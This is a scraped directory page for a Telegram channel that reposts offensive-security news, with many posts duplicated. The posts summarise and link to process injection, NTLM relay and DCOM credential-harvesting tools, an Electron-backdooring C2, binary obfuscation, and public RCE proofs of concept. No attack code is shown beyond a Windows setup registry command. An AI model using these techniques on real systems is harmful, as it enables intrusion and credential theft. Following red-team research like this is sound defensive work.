1N73LL1G3NC3
Reborn…
TGlist rating
0
0
TypePublic
Verification
Not verifiedTrust
Not trustedLocation
LanguageOther
Channel creation dateDec 16, 2024
Added to TGlist
Feb 06, 2025Latest posts in group "1N73LL1G3NC3"
Reposted from:
Offensive Twitter
15.04.202508:03
😈 [ Check Point Research @_CPResearch_ ]
Thread Execution Hijacking is one of the well-known methods that can be used to run implanted code.
In this blog we introduce a new injection method, that is based on this classic technique, but much stealthier - Waiting Thread Hijacking.
Blog:
🔗 https://research.checkpoint.com/2025/waiting-thread-hijacking/
Code:
🔗 https://github.com/hasherezade/waiting_thread_hijacking
🐥 [ tweet ]
Thread Execution Hijacking is one of the well-known methods that can be used to run implanted code.
In this blog we introduce a new injection method, that is based on this classic technique, but much stealthier - Waiting Thread Hijacking.
Blog:
🔗 https://research.checkpoint.com/2025/waiting-thread-hijacking/
Code:
🔗 https://github.com/hasherezade/waiting_thread_hijacking
🐥 [ tweet ]
Reposted from:
Ralf Hacker Channel
14.04.202518:02
NTLM релей в WinRMS, не ждали? А вот...
Blog: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Soft: https://github.com/fortra/impacket/pull/1947
#pentest #redteam #relay #ad #lateralmovement
Blog: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Soft: https://github.com/fortra/impacket/pull/1947
#pentest #redteam #relay #ad #lateralmovement
Reposted from:
Волосатый бублик
08.04.202514:55
[ RemoteMonologue: Weaponizing DCOM for NTLM authentication coercions ]
A Windows credential harvesting attack that leverages the Interactive User RunAs key and coerces NTLM authentications via DCOM. Remotely compromise users without moving laterally or touching LSASS.
Blog: https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions
Tool: https://github.com/xforcered/RemoteMonologue
A Windows credential harvesting attack that leverages the Interactive User RunAs key and coerces NTLM authentications via DCOM. Remotely compromise users without moving laterally or touching LSASS.
Blog: https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions
Tool: https://github.com/xforcered/RemoteMonologue
03.04.202520:58
Loki
Node JS C2 for backdooring vulnerable Electron applications to bypass application controls. This technique abuses the trust of signed vulnerable Electron applications to gain execution on a target system.
Since Electron applications execute JavaScript at runtime, modifying these JavaScript files allows attackers to inject arbitrary Node.js code into the Electron process. By leveraging Node.js and Chromium APIs, JavaScript code can interact with the operating system.
Loki was designed to backdoor Electron applications by replacing the applications JavaScript files with the Loki Command & Control JavaScript files.
Blog: Bypassing Windows Defender Application Control with Loki C2
Node JS C2 for backdooring vulnerable Electron applications to bypass application controls. This technique abuses the trust of signed vulnerable Electron applications to gain execution on a target system.
Since Electron applications execute JavaScript at runtime, modifying these JavaScript files allows attackers to inject arbitrary Node.js code into the Electron process. By leveraging Node.js and Chromium APIs, JavaScript code can interact with the operating system.
Loki was designed to backdoor Electron applications by replacing the applications JavaScript files with the Loki Command & Control JavaScript files.
Blog: Bypassing Windows Defender Application Control with Loki C2
30.03.202514:02
30.03.202510:50
💻 Windows 11 is not killing off hack that lets you bypass Microsoft account, but it takes more effort now
Microsoft noted in a blog post.
You just need to create a new Registry value by following these steps, to bypass it:
Or you can just open Command Prompt and run the following script:
We’re removing the bypassnro.cmd script to enhance security and user experience of Windows 11. This change ensures that all users exit setup with internet connectivity and a Microsoft Account
Microsoft noted in a blog post.
You just need to create a new Registry value by following these steps, to bypass it:
• On the “Let’s connect you to a network” screen, press Shift + F10 to open Command Prompt.
• Type regedit to open the Registry Editor.
• In Registry Editor, navigate to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\OOBE
• Right-click on the blank space in the right panel and select:
• New > DWORD (32-bit) Value
• Name it exactly: BypassNRO
• Double-click BypassNRO, and set the value data to 1.
• Close Registry Editor.
• Restart.
Or you can just open Command Prompt and run the following script:
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\OOBE" /v BypassNRO /t REG_DWORD /d 1 /f
shutdown /r /t 0
Reposted from:Offensive Twitter
27.03.202513:11
😈 [ Craig Rowland - Agentless Linux Security @CraigHRowland ]
This new Linux script from THC will encrypt and obfuscate any executable or script to hide from on-disk detection:
🔗 https://github.com/hackerschoice/bincrypter
I'm going to show you how to detect it with command line tools in this thread:
🔗 https://threadreaderapp.com/thread/1905052948935377402.html
🐥 [ tweet ]
This new Linux script from THC will encrypt and obfuscate any executable or script to hide from on-disk detection:
🔗 https://github.com/hackerschoice/bincrypter
I'm going to show you how to detect it with command line tools in this thread:
🔗 https://threadreaderapp.com/thread/1905052948935377402.html
🐥 [ tweet ]
Reposted from:Ralf Hacker Channel
26.03.202508:19
Вчера пошумел IngressNightmare: Unauth RCE в Ingress NGINX Controller, что может привести к захвату кластера Kubernetes.
Patched: Feb 7, 2025
Blog: https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
PoC: https://github.com/sandumjacob/IngressNightmare-POCs
#rce #kuber #pentest #exploit
Patched: Feb 7, 2025
Blog: https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
PoC: https://github.com/sandumjacob/IngressNightmare-POCs
А вас тоже расстраивают ресерчи без кода PoC??
#rce #kuber #pentest #exploit
25.03.202522:04
ForsHops
Fileless lateral movement with trapped COM objects
Blog: https://www.ibm.com/think/news/fileless-lateral-movement-trapped-com-objects
Fileless lateral movement with trapped COM objects
Blog: https://www.ibm.com/think/news/fileless-lateral-movement-trapped-com-objects
25.03.202512:43
🐎 Red Teaming with ServiceNow
This blog post aims to highlight how access to ServiceNow can be abused to perform a range of attacks, of which 5 are described below:
• Attack 1 – Custom Actions [Code Execution, Credential Retrieval]
• Attack 2 – Discovery [Credential Capture, Code Execution]
• Attack 3 – Orchestration [Relaying, Code Execution, Active Directory Modification]
• Attack 4 – LDAP Listener [Credential Capture]
• Attack 5 – Relaying [Credential Capture, Execution, Active Directory Modification]
This blog post aims to highlight how access to ServiceNow can be abused to perform a range of attacks, of which 5 are described below:
• Attack 1 – Custom Actions [Code Execution, Credential Retrieval]
• Attack 2 – Discovery [Credential Capture, Code Execution]
• Attack 3 – Orchestration [Relaying, Code Execution, Active Directory Modification]
• Attack 4 – LDAP Listener [Credential Capture]
• Attack 5 – Relaying [Credential Capture, Execution, Active Directory Modification]
21.03.202510:16
18.03.202516:26
CVE-2025-24071: NTLM Hash Leak via RAR/ZIP Extraction and .library-ms File
When a specially crafted .library-ms file containing an SMB path is compressed within a RAR/ZIP archive and subsequently extracted, Windows Explorer automatically parses the contents of this file due to its built-in indexing and preview mechanism. This behavior occurs because Windows Explorer processes certain file types automatically upon extraction to generate previews, thumbnails, or index metadata, even if the file is never explicitly opened or clicked by the user.
Blog: https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
When a specially crafted .library-ms file containing an SMB path is compressed within a RAR/ZIP archive and subsequently extracted, Windows Explorer automatically parses the contents of this file due to its built-in indexing and preview mechanism. This behavior occurs because Windows Explorer processes certain file types automatically upon extraction to generate previews, thumbnails, or index metadata, even if the file is never explicitly opened or clicked by the user.
Blog: https://cti.monster/blog/2025/03/18/CVE-2025-24071.html
18.03.202511:34
CVE-2025-0927 LPE
HFS+ file system implementation in the Linux Kernel contains a heap overflow vulnerability that achieves local privilege escalation on Ubuntu 22.04 for active user sessions.
Affected Versions:
• Linux Kernel, up to 6.12.0
• Ubuntu 22.04 with Linux Kernel 6.5.0-18-generic
HFS+ file system implementation in the Linux Kernel contains a heap overflow vulnerability that achieves local privilege escalation on Ubuntu 22.04 for active user sessions.
Affected Versions:
• Linux Kernel, up to 6.12.0
• Ubuntu 22.04 with Linux Kernel 6.5.0-18-generic
11.03.202507:03
GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15
P.S. In the previous blog post on ADCS (Goad Pwning Part 6), ESC1, ESC2, ESC3, ESC4, ESC6, and ESC8 were exploited.
P.S. In the previous blog post on ADCS (Goad Pwning Part 6), ESC1, ESC2, ESC3, ESC4, ESC6, and ESC8 were exploited.
Records
16.04.202523:59
3.3KSubscribers05.02.202515:16
100Citation index04.03.202516:12
1.4KAverage views per post10.03.202516:12
1.4KAverage views per ad post09.04.202523:59
11.41%ER11.02.202516:12
56.94%ERR25.03.202512:43
🐎 Red Teaming with ServiceNow
This blog post aims to highlight how access to ServiceNow can be abused to perform a range of attacks, of which 5 are described below:
• Attack 1 – Custom Actions [Code Execution, Credential Retrieval]
• Attack 2 – Discovery [Credential Capture, Code Execution]
• Attack 3 – Orchestration [Relaying, Code Execution, Active Directory Modification]
• Attack 4 – LDAP Listener [Credential Capture]
• Attack 5 – Relaying [Credential Capture, Execution, Active Directory Modification]
This blog post aims to highlight how access to ServiceNow can be abused to perform a range of attacks, of which 5 are described below:
• Attack 1 – Custom Actions [Code Execution, Credential Retrieval]
• Attack 2 – Discovery [Credential Capture, Code Execution]
• Attack 3 – Orchestration [Relaying, Code Execution, Active Directory Modification]
• Attack 4 – LDAP Listener [Credential Capture]
• Attack 5 – Relaying [Credential Capture, Execution, Active Directory Modification]
Reposted from:Offensive Twitter
27.03.202513:11
😈 [ Craig Rowland - Agentless Linux Security @CraigHRowland ]
This new Linux script from THC will encrypt and obfuscate any executable or script to hide from on-disk detection:
🔗 https://github.com/hackerschoice/bincrypter
I'm going to show you how to detect it with command line tools in this thread:
🔗 https://threadreaderapp.com/thread/1905052948935377402.html
🐥 [ tweet ]
This new Linux script from THC will encrypt and obfuscate any executable or script to hide from on-disk detection:
🔗 https://github.com/hackerschoice/bincrypter
I'm going to show you how to detect it with command line tools in this thread:
🔗 https://threadreaderapp.com/thread/1905052948935377402.html
🐥 [ tweet ]
03.04.202520:58
Loki
Node JS C2 for backdooring vulnerable Electron applications to bypass application controls. This technique abuses the trust of signed vulnerable Electron applications to gain execution on a target system.
Since Electron applications execute JavaScript at runtime, modifying these JavaScript files allows attackers to inject arbitrary Node.js code into the Electron process. By leveraging Node.js and Chromium APIs, JavaScript code can interact with the operating system.
Loki was designed to backdoor Electron applications by replacing the applications JavaScript files with the Loki Command & Control JavaScript files.
Blog: Bypassing Windows Defender Application Control with Loki C2
Node JS C2 for backdooring vulnerable Electron applications to bypass application controls. This technique abuses the trust of signed vulnerable Electron applications to gain execution on a target system.
Since Electron applications execute JavaScript at runtime, modifying these JavaScript files allows attackers to inject arbitrary Node.js code into the Electron process. By leveraging Node.js and Chromium APIs, JavaScript code can interact with the operating system.
Loki was designed to backdoor Electron applications by replacing the applications JavaScript files with the Loki Command & Control JavaScript files.
Blog: Bypassing Windows Defender Application Control with Loki C2
Reposted from:Ralf Hacker Channel
14.04.202518:02
NTLM релей в WinRMS, не ждали? А вот...
Blog: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Soft: https://github.com/fortra/impacket/pull/1947
#pentest #redteam #relay #ad #lateralmovement
Blog: https://sensepost.com/blog/2025/is-tls-more-secure-the-winrms-case./
Soft: https://github.com/fortra/impacket/pull/1947
#pentest #redteam #relay #ad #lateralmovement
25.03.202522:04
ForsHops
Fileless lateral movement with trapped COM objects
Blog: https://www.ibm.com/think/news/fileless-lateral-movement-trapped-com-objects
Fileless lateral movement with trapped COM objects
Blog: https://www.ibm.com/think/news/fileless-lateral-movement-trapped-com-objects
Reposted from:Волосатый бублик
08.04.202514:55
[ RemoteMonologue: Weaponizing DCOM for NTLM authentication coercions ]
A Windows credential harvesting attack that leverages the Interactive User RunAs key and coerces NTLM authentications via DCOM. Remotely compromise users without moving laterally or touching LSASS.
Blog: https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions
Tool: https://github.com/xforcered/RemoteMonologue
A Windows credential harvesting attack that leverages the Interactive User RunAs key and coerces NTLM authentications via DCOM. Remotely compromise users without moving laterally or touching LSASS.
Blog: https://www.ibm.com/think/x-force/remotemonologue-weaponizing-dcom-ntlm-authentication-coercions
Tool: https://github.com/xforcered/RemoteMonologue
Reposted from:Offensive Twitter
15.04.202508:03
😈 [ Check Point Research @_CPResearch_ ]
Thread Execution Hijacking is one of the well-known methods that can be used to run implanted code.
In this blog we introduce a new injection method, that is based on this classic technique, but much stealthier - Waiting Thread Hijacking.
Blog:
🔗 https://research.checkpoint.com/2025/waiting-thread-hijacking/
Code:
🔗 https://github.com/hasherezade/waiting_thread_hijacking
🐥 [ tweet ]
Thread Execution Hijacking is one of the well-known methods that can be used to run implanted code.
In this blog we introduce a new injection method, that is based on this classic technique, but much stealthier - Waiting Thread Hijacking.
Blog:
🔗 https://research.checkpoint.com/2025/waiting-thread-hijacking/
Code:
🔗 https://github.com/hasherezade/waiting_thread_hijacking
🐥 [ tweet ]
Reposted from:Ralf Hacker Channel
26.03.202508:19
Вчера пошумел IngressNightmare: Unauth RCE в Ingress NGINX Controller, что может привести к захвату кластера Kubernetes.
Patched: Feb 7, 2025
Blog: https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
PoC: https://github.com/sandumjacob/IngressNightmare-POCs
#rce #kuber #pentest #exploit
Patched: Feb 7, 2025
Blog: https://www.wiz.io/blog/ingress-nginx-kubernetes-vulnerabilities
PoC: https://github.com/sandumjacob/IngressNightmare-POCs
А вас тоже расстраивают ресерчи без кода PoC??
#rce #kuber #pentest #exploit
Log in to unlock more functionality.
